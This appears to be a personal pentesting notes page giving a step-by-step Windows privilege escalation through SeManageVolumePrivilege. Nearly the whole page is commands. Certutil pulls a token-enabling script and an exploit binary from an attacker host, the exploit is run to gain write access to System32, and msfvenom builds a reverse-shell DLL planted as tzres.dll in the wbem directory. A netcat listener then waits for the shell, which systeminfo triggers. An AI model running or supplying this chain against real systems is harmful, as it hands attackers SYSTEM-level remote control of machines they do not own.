Skip to content

SeManageVolumePrivilege

Original repo at https://github.com/xct/SeManageVolumeAbuse

Forked to: https://github.com/amandaguglieri/SeManageVolumeAbuse.git

Source for explotation: https://hackfa.st/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeManageVolumePrivilege/#exploit-with-wertrigger

Step 1: Check current user privileges

  1. Verify if the current user has SeManageVolumePrivilege: 
1
whoami /priv

Step 2: Enable SeManageVolumePrivilege (optional)

  1. Download the EnableAllTokenPrivs.ps1 script: 
1
wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

  1. Transfer the script to the target machine:

    1
    certutil -urlcache -f http://[IP-ADDRESS]:80/EnableAllTokenPrivs.ps1 EnableAllTokenPrivs.ps1

  2. Import the module to enable the privilege

1
Import-Module .\EnableAllTokenPrivs.ps1`
  1. Verify privileges again to confirm that SeManageVolumePrivilege is enabled:
    1
    whoami /priv

Step 3: DLL hijacking with Metasploit

  1. Download and transfer SeManageVolumeExploit.exe to the target: 
1
wget https://github.com/amandaguglieri/SeManageVolumeAbuse/releases/download/1.0/SeManageVolumeAbuse.exe
  1. Transfer it using certutil: 
1
certutil -urlcache -f http://[IP-ADDRESS]:80/SeManageVolumeExploit.exe SeManageVolumeExploit.exe
  1. Execute the exploit to gain write privileges to C:\Windows\System32\:
1
.\SeManageVolumeExploit.exe
  1. Create a malicious DLL payload with msfvenom: 
1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=1337 -f dll -o tzres.dll
  1. Place the malicious DLL in the WBEM directory: 
1
copy tzres.dll C:\Windows\System32\wbem\
  1. Set up a Netcat listener on the attacking machine:
1
rlwrap -cAr nc -lnvp 1337
  1. Activate the payload by running:
1
systeminfo
Last update: 2025-10-11
Created: September 7, 2025 23:07:11